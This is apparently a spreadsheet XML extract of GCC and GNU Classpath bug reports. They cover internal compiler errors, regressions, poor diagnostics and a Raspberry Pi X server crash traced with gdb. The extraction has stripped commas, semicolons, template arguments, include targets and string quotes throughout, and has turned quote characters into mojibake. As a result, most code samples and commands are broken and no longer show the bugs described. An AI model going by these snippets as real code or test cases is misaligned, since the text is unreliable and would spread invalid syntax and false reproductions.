    <t>Using gcc-4_6-branch@181398 the following program ICEs:
$ cat test.ii
class Clock {
  double Now()
}
template  static void Foo(Clock* clock) {
  const int now = clock-&gt;Now()
}
$ g++ -std=c++0x -fsyntax-only test.ii
test.ii: In function â€˜void Foo(Clock*)â€™:
test.ii:5:30: internal compiler error: unexpected expression â€˜clock-&gt;â€™ of kind arrow_expr
Please submit a full bug report</t>
  </si>
  <si>
    <t>GCC-29169</t>
  </si>
  <si>
    <t>sse3-not-fisttp.c scan-assembler-not fisttp FAILs on i386-pc-solaris2.10</t>
  </si>
  <si>
    <t>sse3-not-fisttp.c scan-assembler-not fisttp FAILs on i386-pc-solaris2.10
I get the following when bootstrapping mainline on i386-pc-solaris2.10:
Executing on host: /u01/var/tmp/gcc_trunk_svn/gcc_20060921/gcc/xgcc -B/u01/var/tmp/gcc_trunk_svn/gcc_20060921/gcc/ /u01/var/tmp/gcc_trunk_svn/gcc/gcc/testsuite/gcc.target/i386/sse3-not-fisttp.c   -O -march=nocona -mno-sse3 -fno-show-column
-S  -o sse3-not-fisttp.s    (timeout = 300)
PASS: gcc.target/i386/sse3-not-fisttp.c (test for excess errors)
FAIL: gcc.target/i386/sse3-not-fisttp.c scan-assembler-not fisttp
Is this test supposed to PASS on Solaris 10 x86?
Brett Albertson</t>
  </si>
  <si>
    <t>brett.albertson</t>
  </si>
  <si>
    <t>GCC-2162</t>
  </si>
  <si>
    <t>solaris2.7 extra -fPIC failures from execute/loop-8.c</t>
  </si>
  <si>
    <t>This is a regression from 2.95.2 so the priority has
been set to high.
When I run the testsuite with -fPIC I get the following
extra failures:
FAIL: gcc.c-torture/execute/loop-8.c execution  -O3 -fomit-frame-pointer
FAIL: gcc.c-torture/execute/loop-8.c execution  -O3 -fomit-frame-pointer -funroll-loops
FAIL: gcc.c-torture/execute/loop-8.c execution  -O3 -fomit-frame-pointer -funroll-all-loops -finline-functions
FAIL: gcc.c-torture/execute/loop-8.c execution  -O3 -g
see:
http://gcc.gnu.org/ml/gcc-testresults/2001-03/msg00030.html
Release:
3.0 20010302 (prerelease)
Environment:
sparc-sun-solaris2.7</t>
  </si>
  <si>
    <t>ghazi</t>
  </si>
  <si>
    <t>GCC-14199</t>
  </si>
  <si>
    <t>[3.4/4.0 regression] Unjustified warning about unused variable</t>
  </si>
  <si>
    <t>Here is some recent regression I see on tree-ssa. I don't have a recent 
mainline checked out so can't test whether this also happens on mainline 
but here is what happens: 
----------------------------- 
struct X { 
    static void foo () 
} 
template  
void foo (const T &amp;t) { 
  t.foo() 
} 
template void foo (const X  
------------------- 
deal.II/base&gt; c++ -c -Wunused x.cc -W -Wall  
x.cc: In function `void foo(const T&amp;) [with T = X]': 
x.cc:10:   instantiated from here 
x.cc:6: warning: unused parameter 't' 
This warning is clearly bogus! 
W.</t>
  </si>
  <si>
    <t>GCC-1315</t>
  </si>
  <si>
    <t>Inner class initializer crash</t>
  </si>
  <si>
    <t xml:space="preserve">From: Bryce McKinlay 
To: java-gnats@sourceware.cygnus.com apbianco@cygnus.com
Cc:  
Subject: Re: gcj/293
Date: Fri 20 Oct 2000 23:23:51 +1300
 &gt; Empty inner class initializer crash
 &gt;
 Actually the initializer doesn't have to be empty. Any inner class that
 has both a default constructor and an initializer block will trigger
 this bug. eg:
 class InnerInit
 {
   int a = 5
   class Inner
   {
     int b
     {
       b = a
     }
     Inner()
     {
       System.out.println (b)
     }
   }
 }
 regards
   [ bryce ]
 http://sources.redhat.com/cgi-bin/gnatsweb.pl?cmd=view&amp;pr=293&amp;database=java
</t>
  </si>
  <si>
    <t>GCC-41738</t>
  </si>
  <si>
    <t>[4.3/4.4 Regression] optabs expands rotate using wrong mode</t>
  </si>
  <si>
    <t>I have been adding rotate capability to AVR port and have come this bug in 
optabs.c: expand_binop()
This occurs during a rotate expansion. For example
target  = op0  rotated by op1
In the particular situation (code extract below) it tries a reverse rotate of (bits - op1). Where this expression is then expanded into an integer
a negation or subtraction depending on type of op1 and target.
The expansion of the subtraction is using the mode of the target - it should be using the mode of op1.
The mode of the rotation  amount need not be the same as the target.
target:DI = Op0:DI rotate op1:HI
In my testcase it is not and I get asserts latter in simplfy_rtx with the mismatched inner/outer modes.
The negation mode looks equally wrong.
I found this on testcase 20010226-1.c with gcc 4.42 (line 55) - however it would appear to be on 4.5 and perhaps earlier versions.
Revision 126370 added this particular code to optabs.c in July 2007
 /* If we were trying to rotate and that didn't work try rotating
    the other direction before falling back to shifts and bitwise-or.  */
 if (((binoptab == rotl_optab
   &amp;&amp; optab_handler (rotr_optab mode)-&gt;insn_code != CODE_FOR_nothing)
      || (binoptab == rotr_optab
      &amp;&amp; optab_handler (rotl_optab mode)-&gt;insn_code != CODE_FOR_nothing))
     &amp;&amp; mclass == MODE_INT)
   {
     optab otheroptab = (binoptab == rotl_optab ? rotr_optab : rotl_optab)
     rtx newop1
     unsigned int bits = GET_MODE_BITSIZE (mode)
     if (CONST_INT_P (op1))
   newop1 = GEN_INT (bits - INTVAL (op1))
     else if (targetm.shift_truncation_mask (mode) == bits - 1)
   newop1 = negate_rtx (mode op1)
     else
   newop1 = expand_binop (mode sub_optab
                  GEN_INT (bits) op1
                  NULL_RTX unsignedp OPTAB_DIRECT)</t>
  </si>
  <si>
    <t>hutchinsonandy</t>
  </si>
  <si>
    <t>GCC-34395</t>
  </si>
  <si>
    <t>[4.3 regression] Broken diagnostic: 'type_pack_expansion' not supported by dump_type_prefix/suffix</t>
  </si>
  <si>
    <t>The C++ frontend issues a broken diagnostic for the following invalid
testcase on mainline:
===========================================
template void foo(int... x[N])
{
  struct A
  {
    A() { x }
  }
}
===========================================
bug.cc: In constructor 'foo(int [N]...)::A::A()':
bug.cc:5: error: use of parameter from containing function
bug.cc:1: error:   '#'type_pack_expansion' not supported by dump_type_prefix#x#'type_pack_expansion' not supported by dump_type_suffix#' declared here</t>
  </si>
  <si>
    <t>GCC-34758</t>
  </si>
  <si>
    <t>[4.3/4.4/4.5/4.6/4.7 regression] Bad diagnostic for circular dependency in constructor default argument</t>
  </si>
  <si>
    <t>The diagnostic for the following invalid code snippet degraded in GCC 3.4.0:
=======================
struct A
{
  A (const A
}
=======================
Since GCC 3.4.0 we get:
bug.cc:3: error: the default argument for parameter 0 of 'A::A(const A&amp;)' has not yet been parsed
But before we got the much clearer diagnostic (although it was just a warning):
bug.cc:3: warning: circular dependency in default args of `A::A(const A&amp;)'
In addition the counting of the parameters should start with 1.</t>
  </si>
  <si>
    <t>GCC-14779</t>
  </si>
  <si>
    <t>[3.3 Regression] the copy constructor for a templatized class is not used in array initialization unless the constructor was previously referenced</t>
  </si>
  <si>
    <t>The copy constructor for a templatized class is not used for struct or array
initialization unless the copy constructor has already been instantiated.
The following code compiles cleanly. However the copy operator for std::pair is
not used in the std::pair array initialization causing internal member pointers
to be incorrectly initialized.
If the noted line is uncommented the copy constructor will be used.
/* Demonstration of a bug with struct and array initialization
 * when using an object with templatized copy constructor.
 */
#include 
#include 
class show_bug
{
public:
	show_bug () : m_ptr (this) {}
	show_bug (const show_bug &amp;sb) : m_ptr (this) {}
	show_bug* m_ptr
}
typedef std::pair pair_bug_t
const show_bug bug_a bug_b
/* UNCOMMENT THE LINE BELOW TO FIX THE BUG
 *  This line instantiates the copy constructor for std::pair
 *  fixing the bug
 */
//const pair_bug_t fix_bug (pair_bug_t (bug_a bug_b))
const pair_bug_t pba[] = { pair_bug_t (bug_a bug_b) }
//-----------------------------
int main (int argc char **argv)
{
	std::cout &lt;&lt; copy constructor called: 
	std::cout &lt;&lt; (pba[0].first.m_ptr == 
}</t>
  </si>
  <si>
    <t>jonathanu</t>
  </si>
  <si>
    <t>GCC-78238</t>
  </si>
  <si>
    <t>[7/8 Regression] [OOP] ICE: verify_gimple failed with -fdefault-integer-8</t>
  </si>
  <si>
    <t>Valid code with explicitly no integer variable in source
and in first test case with no 4-byte integer value.
ICE with option -fdefault-integer-8 or similar seen with 7.
$ cat z1.f90
program p
   type t
      class(*) allocatable :: q(:)
   end type
   type(t) :: z
   real :: a(2_8) = [1.0 2.0]
   allocate (z%q(2_8) source=a)
   call s
contains
   subroutine s
      select type (x =&gt; z%q)
      type is (real)
         if ( any(x/=a) ) call abort
      end select
   end
end
$ cat z2.f90
program p
   type t
      class(*) allocatable :: q(:)
   end type
   type(t) :: z
   real :: a(2) = [1.0 2.0]
   allocate (z%q(2) source=a)
   call s
contains
   subroutine s
      select type (x =&gt; z%q)
      type is (real)
         if ( any(x/=a) ) call abort
      end select
   end
end
$ gfortran-7-20161106 -fdefault-integer-8 z1.f90
z1.f90:10:0:
    subroutine s
Error: mismatching comparison operand types
integer(kind=4)
integer(kind=8)
if (_10 == 64409183) goto  else goto 
z1.f90:10:0: internal compiler error: verify_gimple failed
0xc745fd verify_gimple_in_seq(gimple*)
        ../../gcc/tree-cfg.c:4876
0x9dcbc2 gimplify_body(tree_node* bool)
        ../../gcc/gimplify.c:12251
0x9dcf56 gimplify_function_tree(tree_node*)
        ../../gcc/gimplify.c:12339
0xcd1892 gimplify_all_functions
        ../../gcc/tree-nested.c:3280
0xcd1877 gimplify_all_functions
        ../../gcc/tree-nested.c:3282
0xcd9fd6 lower_nested_functions(tree_node*)
        ../../gcc/tree-nested.c:3299
0x84aa76 cgraph_node::analyze()
        ../../gcc/cgraphunit.c:632
0x84e073 analyze_functions
        ../../gcc/cgraphunit.c:1087
0x84ed88 symbol_table::finalize_compilation_unit()
        ../../gcc/cgraphunit.c:2562</t>
  </si>
  <si>
    <t>GCC-64971</t>
  </si>
  <si>
    <t>[5 Regression] gcc.c-torture/compile/pr37433.c ICEs with -mabi=ilp32</t>
  </si>
  <si>
    <t>Excess errors:
/home/apinski/src/gcc-cavium/gcc/gcc/testsuite/gcc.c-torture/compile/pr37433.c:5:1: error: unrecognizable insn:
(call_insn/j 6 5 7 2 (parallel [
            (set (reg:SI 0 x0)
                (call (mem:DI (symbol_ref/f:SI (*.LC0) [flags 0x82] ) [0 *_1 S8 A8])
                    (const_int 0 [0])))
            (return)
            (use (const_int 0 [0]))
        ]) /home/apinski/src/gcc-cavium/gcc/gcc/testsuite/gcc.c-torture/compile/pr37433.c:4 -1
     (expr_list:REG_CALL_DECL (nil)
        (nil))
    (expr_list (clobber (reg:DI 17 x17))
        (expr_list (clobber (reg:DI 16 x16))
            (expr_list:SI (use (reg:SI 0 x0))
                (nil)))))
This testcase used to pass at one point.</t>
  </si>
  <si>
    <t>GCC-19070</t>
  </si>
  <si>
    <t>internal compiler error: in generate_bytecode_conditional at java/jcf-write.c:1271</t>
  </si>
  <si>
    <t>internal compiler error: in generate_bytecode_conditional at java/jcf-write.c:1271
Some specific syntax (see below) in the java prog I am trying to compile causes
the above error...
Here are my details...
/usr/share/gcc-4.0a/bin/gcc -v
Reading specs from /usr/share/gcc-4.0a/lib/gcc/i686-pc-linux-gnu/4.0.0/specs
Configured with: ../gcc/configure --prefix=/usr/share/gcc-4.0a --enable-java-awt=gtk
Thread model: posix
gcc version 4.0.0 20041130 (experimental)
uname -a
Linux bleah.com 2.6.9-1.6_FC2 #1 Thu Nov 18 22:03:19 EST 2004 i686 athlon i386
GNU/Linux
Compiled using... gcj -C
The bug is triggered by the following code example...
public class testish {
    public void test (){
	Number ping = (Number) new Integer(10)
	double pong = ping.doubleValue()
	if (pong != null){                       &lt;-- Line 5
	    System.out.println(well...)
	}
    }
}
/usr/share/gcc-4.0a/bin/gcj -C testish.java
testish.java: In class 'testish':
testish.java: In method 'testish.test()':
testish.java:5: internal compiler error: in generate_bytecode_conditional at
java/jcf-write.c:1271
Please submit a full bug report
I haven't tried to compile with JDK.</t>
  </si>
  <si>
    <t>GCC-46432</t>
  </si>
  <si>
    <t>v850-elf --enable-werror-always build fails</t>
  </si>
  <si>
    <t>../../../gcc/gcc/final.c: In function â€˜profile_functionâ€™:
../../../gcc/gcc/final.c:1627:45: error: suggest braces around empty body in an â€˜ifâ€™ statement [-Werror=empty-body]
../../../gcc/gcc/final.c:1629:46: error: suggest braces around empty body in an â€˜ifâ€™ statement [-Werror=empty-body]
../../../gcc/gcc/final.c:1636:45: error: suggest braces around empty body in an â€˜ifâ€™ statement [-Werror=empty-body]
../../../gcc/gcc/final.c:1638:44: error: suggest braces around empty body in an â€˜ifâ€™ statement [-Werror=empty-body]</t>
  </si>
  <si>
    <t>CLASSPATH-27920</t>
  </si>
  <si>
    <t>NullPointerException in javax.swing.tree.VariableHeightLayoutCache.setModel()</t>
  </si>
  <si>
    <t>When running openjump with the CVS version of classpath I now get this error.
Never seen it before so it is introduced the last two days.
Exception during event dispatch:
java.lang.NullPointerException
   at javax.swing.tree.VariableHeightLayoutCache.setModel(VariableHeightLayoutCache.java:559)
   at javax.swing.plaf.basic.BasicTreeUI.setModel(BasicTreeUI.java:518)
   at javax.swing.plaf.basic.BasicTreeUI.installUI(BasicTreeUI.java:1353)
   at javax.swing.plaf.metal.MetalTreeUI.installUI(MetalTreeUI.java:107)
   at javax.swing.JComponent.setUI(JComponent.java:3056)
   at javax.swing.JTree.setUI(JTree.java:1622)
   at javax.swing.JTree.updateUI(JTree.java:1630)
   at javax.swing.JTree.(JTree.java:1517)
   at javax.swing.JTree.(JTree.java:1481)
   at com.vividsolutions.jump.workbench.ui.TreeLayerNamePanel$1.(TreeLayerNamePanel.java:104)
   at com.vividsolutions.jump.workbench.ui.TreeLayerNamePanel.(TreeLayerNamePanel.java:104)
   at com.vividsolutions.jump.workbench.ui.TaskFrame.createLayerNamePanel(TaskFrame.java:155)
   at com.vividsolutions.jump.workbench.ui.TaskFrame$1.internalFrameOpened(TaskFrame.java:130)
   at javax.swing.JInternalFrame.fireInternalFrameEvent(JInternalFrame.java:747)
   at javax.swing.JInternalFrame.show(JInternalFrame.java:1729)
   at java.awt.Component.show(Component.java:934)
   at java.awt.Component.setVisible(Component.java:884)
   at javax.swing.JComponent.setVisible(JComponent.java:2995)
   at com.vividsolutions.jump.workbench.ui.WorkbenchFrame.addInternalFrame(WorkbenchFrame.java:473)
   at com.vividsolutions.jump.workbench.ui.WorkbenchFrame.addInternalFrame(WorkbenchFrame.java:456)
   at com.vividsolutions.jump.workbench.ui.WorkbenchFrame.addTaskFrame(WorkbenchFrame.java:614)
   at com.vividsolutions.jump.workbench.ui.WorkbenchFrame.addTaskFrame(WorkbenchFrame.java:600)
   at com.vividsolutions.jump.workbench.ui.WorkbenchFrame.addTaskFrame(WorkbenchFrame.java:585)
   at com.vividsolutions.jump.workbench.ui.plugin.FirstTaskFramePlugIn$1.componentShown(FirstTaskFramePlugIn.java:68)
   at java.awt.AWTEventMulticaster.componentShown(AWTEventMulticaster.java:213)
   at java.awt.Component.processComponentEvent(Component.java:3005)
   at java.awt.Component.processEvent(Component.java:2967)
   at java.awt.Container.processEvent(Container.java:950)
   at java.awt.Window.processEvent(Window.java:692)
   at java.awt.Component.dispatchEventImpl(Component.java:5059)
   at java.awt.Container.dispatchEventImpl(Container.java:1777)
   at java.awt.Window.dispatchEventImpl(Window.java:675)
   at java.awt.Component.dispatchEvent(Component.java:2318)
   at java.awt.EventQueue.dispatchEvent(EventQueue.java:474)
   at java.awt.EventDispatchThread.run(EventDispatchThread.java:95)</t>
  </si>
  <si>
    <t>pere</t>
  </si>
  <si>
    <t>GCC-33340</t>
  </si>
  <si>
    <t>[4.3 Regression] ICE: SSA corruption   with -O (FRE)</t>
  </si>
  <si>
    <t>&gt; cat bug.ii
void* operator new(unsigned long void* __p) { }
struct auto_ptr {
        int* p
        ~auto_ptr() { delete p }
}
typedef void* T
struct vector {
        void push_back(const T&amp; __x) {
                ::new(0) T(__x)
                insert(__x)
        }
        void insert(const T
} v
void g()
void f() {
        auto_ptr ap
        if (ap.p) {
                ap.p = new int()
        }
        g()
        int* tmp = ap.p
        ap.p = 0
        v.push_back(tmp)
}
&gt; g++ -O bug.ii
Unable to coalesce ssa_names 13 and 16 which are marked as MUST COALESCE.
ap$p_13(ab) and  ap$p_16(ab)
bug.ii: In function â€˜void f()â€™:
bug.ii:18: internal compiler error: SSA corruption
Tested with SVN revision 128251 on linux_x86_64.</t>
  </si>
  <si>
    <t>vermaelen.wouter</t>
  </si>
  <si>
    <t>GCC-50546</t>
  </si>
  <si>
    <t>gfortran should not accept missing operator  (r178939)</t>
  </si>
  <si>
    <t>! gfortran should not accept missing operator  (r178939)
      module m
       interface assignment(=)
       end interface
      end module
      use m only : operator(+)
      end</t>
  </si>
  <si>
    <t>GCC-82461</t>
  </si>
  <si>
    <t>[7 Regression] Temporary required for brace-initializing (non-literal-type) member variable</t>
  </si>
  <si>
    <t>class A {
private:
public:
  constexpr A() {}
  ~A() {}
}
class B {
private:
  A  a
public:
  constexpr B() : a{} {}
// works also with g++ -std=c++17:
// constexpr B() : a() {}
  ~B() {}
}
When compiling this with -std=c++17 g++ reports:
error: temporary of non-literal type â€˜Aâ€™ in a constant expression
note:   â€˜Aâ€™ has a non-trivial destructor
With -std=c++11 and 14 g++ accepts this code as do clang 5.0 and MS cl 19.11</t>
  </si>
  <si>
    <t>tvb377</t>
  </si>
  <si>
    <t>GCC-7536</t>
  </si>
  <si>
    <t>C++ front end does not warn of promotion of negative ints to unsigneds</t>
  </si>
  <si>
    <t>An expression int+unsigned or int-unsigned promotes the int variable to an unsigned before doing the operation. Quite often this can do the /wrong/ thing just like comparisons of ints and unsigneds. g++ should warn for obvious mistakes (as the c front end does) and should optionally warn for less obvious mistakes.
e.g.
unsigned a = 15
double b = -30 - a
should issue a warning as b ends up at around 2^32 and probably not the expected -15.
Further possibilities for warning are:
unsigned a = 15
int b = -30
double c = b-c
(the same thing).
Another possibility is for warning for every implicit int/unsigned arithmetic operation/promotion as the int could be negative. For instance:
double dostuff(int i)
{
  const unsigned cx = 10
  return i-cx
}
int main()
{
  dostuff(-10)  // dangerous
  return 0
}
This can hide a serious error. However many programs will give lots of warnings. Maybe this could go into -Wconversion?
The operation int+unsigned usually works (due to twos-complement representation - is this part of the standard?) however things like
int a = -10
unsigned b = 20
double c = b + a
should also be flagged if the operation relies on non-defined behaviour.
I'll include a test-case for warnings.
Release:
gcc-3.1
Environment:
gcc-3.1 (RedHat RPM 3.1-1) on RedHat Linux 7.3 on an AMD Athlon (compiling for i386)
How-To-Repeat:
Compile above with
g++ -W -Wall -Wconversions -O2 test.cc</t>
  </si>
  <si>
    <t>GCC-61144</t>
  </si>
  <si>
    <t>[4.9/5 Regression] Invalid optimizations for extern vars with local weak definitions</t>
  </si>
  <si>
    <t>GCC 4.8.2 introduced a bug in optimization (present at all -O levels except -O0) in the presence of extern objects with weak definitions local to the translation unit. The bug is also present in 4.9.0. The following minimal testcase shows the problem:
static int dummy = 0
extern int foo __attribute__((__weak__ __alias__(dummy)))
int bar() { if (foo) return 1 return 0 }
This should produce a nontrivial bar which can conditionally return 0 or 1 depending on the contents of foo. Instead on gcc 4.8.2 and 4.9.0 it produces a function which always returns 0.
GCC versions with this bug have been reported to produce a seriously broken libc.a/libc.so for musl libc (e.g. fflush(NULL) fails to flush stdout).
Removing static above causes the symptom to go away so presumably GCC is wrongly transferring knowledge that dummy is static onto foo and thereby assuming foo is not externally reachable/modifiable. IIRC clang/LLVM had the same bug a couple years back and fixed it it looks like GCC has newly introduced it.
I don't know what component this should be marked as sadly there's no unknown option so I just put c. It should presumably be on one of the optimization ones but I'm not sure which.</t>
  </si>
  <si>
    <t>bugdal</t>
  </si>
  <si>
    <t>GCC-8085</t>
  </si>
  <si>
    <t>[Mainline regression]: mips-sgi-irix6.5 failure in execute/921117-1.c w/-O2</t>
  </si>
  <si>
    <t>Testsuite regression see:
http://gcc.gnu.org/ml/gcc-testresults/2002-09/msg00882.html
http://gcc.gnu.org/ml/gcc-testresults/2002-09/msg00901.html
The resulting executable fails it's own test on line 20 and calls abort().  With gdb I see that the parameter p contains garbage:
(gdb) break check
Breakpoint 1 at 0x10001374: file execute/921117-1.c line 9.
(gdb) run
Starting program: /caip/u58/ghazi/gcc-testing/egcc-CVS20020927/gcc/testsuite/gcc.c-torture/a.out
Breakpoint 1 check (p={text = \0\0\0\0\0\0\0\089 flag = 0})
    at execute/921117-1.c:9
9         if (p.flag != 99)
(gdb) cont
Continuing.
Program received signal SIGABRT Aborted.
Release:
gcc version 3.3 20020927 (experimental)
Environment:
mips-sgi-irix6.5</t>
  </si>
  <si>
    <t>GCC-63346</t>
  </si>
  <si>
    <t>xserver_xorg-server-1.15.1 crash on RaspberryPi when compiled with gcc-4.9</t>
  </si>
  <si>
    <t>Hello
running xserver (driver fbdev) on RaspberryPi crashes when compiled with gcc-4.9 (-Os).
Steps to reproduce (with buildroot-2014.05 release and additonal dillo package):
$ cd buildroot-2014.05
Get Patch 'dillo: new package'
$ wget http://git.buildroot.net/buildroot/patch/?id=65b47530229b1ebaa4e2d40ff765614bbd6423ca
$ patch -p 1 &lt; ../index.html\?id\=65b47530229b1ebaa4e2d40ff765614bbd6423ca
$ cd ..
$ mkdir build_gcc_4_9
$ make O=$PWD -C ../buildroot-2014.05 raspberrypi_defconfig
Change to use gcc-4.9 glibc add dillo xserver (and gdb/gdbserver):
diff -u ../buildroot-2014.05/configs/raspberrypi_defconfig defconfig 
--- ../buildroot-2014.05/configs/raspberrypi_defconfig  2014-05-31 09:52:49.000000000 +0200
+++ defconfig   2014-06-07 23:34:23.070203324 +0200
@@ -122 +132 @@
 BR2_arm=y
 BR2_arm1176jzf_s=y
-
-BR2_TOOLCHAIN_BUILDROOT_LARGEFILE=y
-BR2_TOOLCHAIN_BUILDROOT_CXX=y
-
-BR2_TARGET_GENERIC_GETTY_PORT=tty1
-
-BR2_PACKAGE_RPI_FIRMWARE=y
-
-# Lock to 3.12 headers as the RPi kernel is based off the 3.12 branch
+BR2_ENABLE_DEBUG=y
+BR2_STRIP_none=y
 BR2_KERNEL_HEADERS_VERSION=y
 BR2_DEFAULT_KERNEL_VERSION=3.12.18
 BR2_PACKAGE_HOST_LINUX_HEADERS_CUSTOM_3_12=y
-
+BR2_TOOLCHAIN_BUILDROOT_GLIBC=y
+BR2_GCC_VERSION_4_9_X=y
+BR2_TOOLCHAIN_BUILDROOT_CXX=y
+BR2_PACKAGE_HOST_GDB=y
+BR2_ROOTFS_DEVICE_CREATION_DYNAMIC_MDEV=y
+BR2_TARGET_GENERIC_GETTY_PORT=tty1
 BR2_LINUX_KERNEL=y
 BR2_LINUX_KERNEL_CUSTOM_GIT=y
 BR2_LINUX_KERNEL_CUSTOM_REPO_URL=git://github.com/raspberrypi/linux.git
 BR2_LINUX_KERNEL_CUSTOM_REPO_VERSION=b09a27249d61475e4423607f7632a5aa6e7b3a53
-BR2_LINUX_KERNEL_USE_DEFCONFIG=y
 BR2_LINUX_KERNEL_DEFCONFIG=bcmrpi_quick
 BR2_LINUX_KERNEL_ZIMAGE=y
+BR2_PACKAGE_GDB=y
+BR2_PACKAGE_GDB_SERVER=y
+BR2_PACKAGE_GDB_DEBUGGER=y
+BR2_PACKAGE_STRACE=y
+BR2_PACKAGE_XORG7=y
+BR2_PACKAGE_XSERVER_XORG_SERVER=y
+BR2_PACKAGE_XSERVER_XORG_SERVER_MODULAR=y
+BR2_PACKAGE_XDRIVER_XF86_INPUT_KEYBOARD=y
+BR2_PACKAGE_XDRIVER_XF86_INPUT_MOUSE=y
+BR2_PACKAGE_XDRIVER_XF86_VIDEO_FBDEV=y
+BR2_PACKAGE_DILLO=y
+BR2_PACKAGE_XTERM=y
+BR2_PACKAGE_RPI_FIRMWARE=y
Run the following on RaspberryPi:
        (rpi)$ X&amp;
# _XSERVTransSocketOpenCOTSServer: Unable to open socket for inet6
_XSERVTransOpen: transport open failed for inet6/buildroot:0
_XSERVTransMakeAllCOTSServerListeners: failed to open listener for inet6
X.Org X Server 1.15.1
Release Date: 2014-04-13
X Protocol Version 11 Revision 0
Build Operating System: Linux 3.7.10-1.32-desktop x86_64
Current Operating System: Linux buildroot 3.12.18-quick #1 PREEMPT Thu May 15 17:08:58 CEST 2014 armv6l
Kernel command line: dma.dmachans=0x7f35 bcm2708_fb.fbwidth=1920 bcm2708_fb.fbheight=1200 bcm2708.boardrev=0xf bcm2708.serial=0xd9096898 smsc95xx.macaddr=B8:27:EB:09:68:98 sdhci-bcm2708.emmc_clock_freq=250000000 vc_mem.mem_base=0x1ec00000 vc_mem.mem_size=0x20000000  dwc_otg.fiq_fix_enable=1 sdhci-bcm2708.sync_after_dma=0 dwc_otg.lpm_enable=0 console=ttyAMA0115200 root=/dev/nfs nfsroot=172.16.0.1:/srv/nfs/rpi_gcc_001 ip=172.16.0.2 rootwait
Build Date: 06 June 2014  12:09:00AM
Current version of pixman: 0.32.4
        Before reporting problems check http://wiki.x.org
        to make sure that you have the latest version.
Markers: (--) probed (**) from config file (==) default setting
        (++) from command line (!!) notice (II) informational
        (WW) warning (EE) error (NI) not implemented (??) unknown.
(==) Log file: /var/log/Xorg.0.log Time: Thu Jan  1 00:08:24 1970
(==) Using default built-in configuration (21 lines)
Initializing built-in extension Generic Event Extension
Initializing built-in extension SHAPE
Initializing built-in extension MIT-SHM
Initializing built-in extension XInputExtension
Initializing built-in extension XTEST
Initializing built-in extension BIG-REQUESTS
Initializing built-in extension SYNC
Initializing built-in extension XKEYBOARD
Initializing built-in extension XC-MISC
Initializing built-in extension XINERAMA
Initializing built-in extension XFIXES
Initializing built-in extension RENDER
Initializing built-in extension RANDR
Initializing built-in extension DAMAGE
Initializing built-in extension DOUBLE-BUFFER
Initializing built-in extension DPMS
Initializing built-in extension Present
Initializing built-in extension X-Resource
Initializing built-in extension XVideo
Initializing built-in extension XVideo-MotionCompensation
Initializing built-in extension XFree86-VidModeExtension
Initializing built-in extension XFree86-DGA
        (rpi)$ export DISPLAY=localhost:0
        (pri)$ dillo
paths: Cannot open file '/root/.dillo/dillorc': No such file or directory
paths: Using /etc/dillo/dillorc
paths: Cannot open file '/root/.dillo/keysrc': No such file or directory
paths: Using /etc/dillo/keysrc
paths: Cannot open file '/root/.dillo/domainrc': No such file or directory
paths: Using /etc/dillo/domainrc
Domain: Default accept.
dillo_dns_init: Here we go! (threaded)
Disabling cookies.
** WARNING **: preferred sans-serif font DejaVu Sans not found.
** WARNING **: preferred serif font DejaVu Serif not found.
** WARNING **: preferred monospace font DejaVu Sans Mono not found.
** WARNING **: preferred cursive font URW Chancery L not found.
** WARNING **: preferred fantasy font DejaVu Sans not found.
Nav_open_url: new url='about:splash'
(EE)
(EE) Backtrace:
(EE)
(EE) Segmentation fault at address 0xffffffff
(EE)
Fatal server error:
(EE) Caught signal 11 (Segmentation fault). Server aborting
(EE)
(EE)
Please consult the The X.Org Foundation support
         at http://wiki.x.org
 for help.
(EE) Please also check the log file at /var/log/Xorg.0.log for additional information.
(EE)
(EE) Server terminated with error (1). Closing log file.
X I/O error
Lets debug it:
        (rpi)$ gdbserver :2500 /usr/bin/X&amp;
        (host)$ host/usr/bin/arm-buildroot-linux-gnueabi-gdb  target/usr/bin/X
GNU gdb (GDB) 7.5.1
Copyright (C) 2012 Free Software Foundation Inc.
License GPLv3+: GNU GPL version 3 or later 
This is free software: you are free to change and redistribute it.
There is NO WARRANTY to the extent permitted by law.  Type show copying
and show warranty for details.
This GDB was configured as --host=x86_64-unknown-linux-gnu --target=arm-buildroot-linux-gnueabi.
For bug reporting instructions please see:
...
Reading symbols from /home/seiderer/Work/RaspberryPi/build_gcc_4_9/target/usr/bin/X...done.
(gdb) set sysroot /home/seiderer/Work/RaspberryPi/build_gcc_4_9/target
(gdb) target remote 172.16.0.2:2500
Remote debugging using 172.16.0.2:2500
Reading symbols from /home/seiderer/Work/RaspberryPi/build_gcc_4_9/target/lib/ld-linux.so.3...done.
Loaded symbols for /home/seiderer/Work/RaspberryPi/build_gcc_4_9/target/lib/ld-linux.so.3
0xb6fd8af0 in _start () from /home/seiderer/Work/RaspberryPi/build_gcc_4_9/target/lib/ld-linux.so.3
(gdb) cont
Continuing.
Program received signal SIGSEGV Segmentation fault.
fbGlyphs (op= pSrc=0x1 pDst=0x4 maskFormat=0x3b9d90 xSrc=0 ySrc=0 nlist=6 list=0xbefff490 glyphs=0x1)
    at fbpict.c:140
140                 glyph = *glyphs++
(gdb) p glyphs
$1 = (GlyphPtr *) 0x1
===&gt;&gt; strange value for glyphs pointer...
(gdb) info reg
r0             0xb4381008       3023573000
r1             0x0      0
r2             0xffffffff       4294967295
r3             0x4      4
r4             0xbefff49c       3204445340
r5             0x4      4
r6             0xbeffdba0       3204438944
r7             0x1      1
r8             0x14     20
r9             0x0      0
r10            0x4      4
r11            0x3      3
r12            0xb6f4abc4       3069488068
sp             0xbeffdb10       0xbeffdb10
lr             0xb6b9ce0c       -1229337076
pc             0xb6b9ce8c       0xb6b9ce8c 
cpsr           0x20000010       536870928
Next try debug with simple printf-like output:
diff -u xserver_xorg-server-1.15.1/fb/fbpict.c_orig xserver_xorg-server-1.15.1/fb/fbpict.c
--- xserver_xorg-server-1.15.1/fb/fbpict.c_orig 2014-06-07 22:28:27.053713080 +0200
+++ xserver_xorg-server-1.15.1/fb/fbpict.c      2014-06-07 23:18:32.451252299 +0200
@@ -906 +9016 @@
        pixman_glyph_cache_remove (glyphCache pGlyph NULL)
 }
+static FILE* f
+static void my_printf(const char* s ...) {
+    va_list ap
+    if (!f) { f = fopen(/root/my.log w+) }
+    va_start(ap s)
+    vfprintf(f s ap)
+    va_end(ap)
+    fflush(f)
+}
+
 static void
 fbGlyphs(CARD8 op
         PicturePtr pSrc
@@ -1126 +1228 @@
     int i n
     int xDst = list-&gt;xOff yDst = list-&gt;yOff
+    my_printf(fbGlyphs() pSrc = %p pDst = %p glyphs = %p\n pSrc pDst glyphs)
+
     miCompositeSourceValidate(pSrc)
     n_glyphs = 0
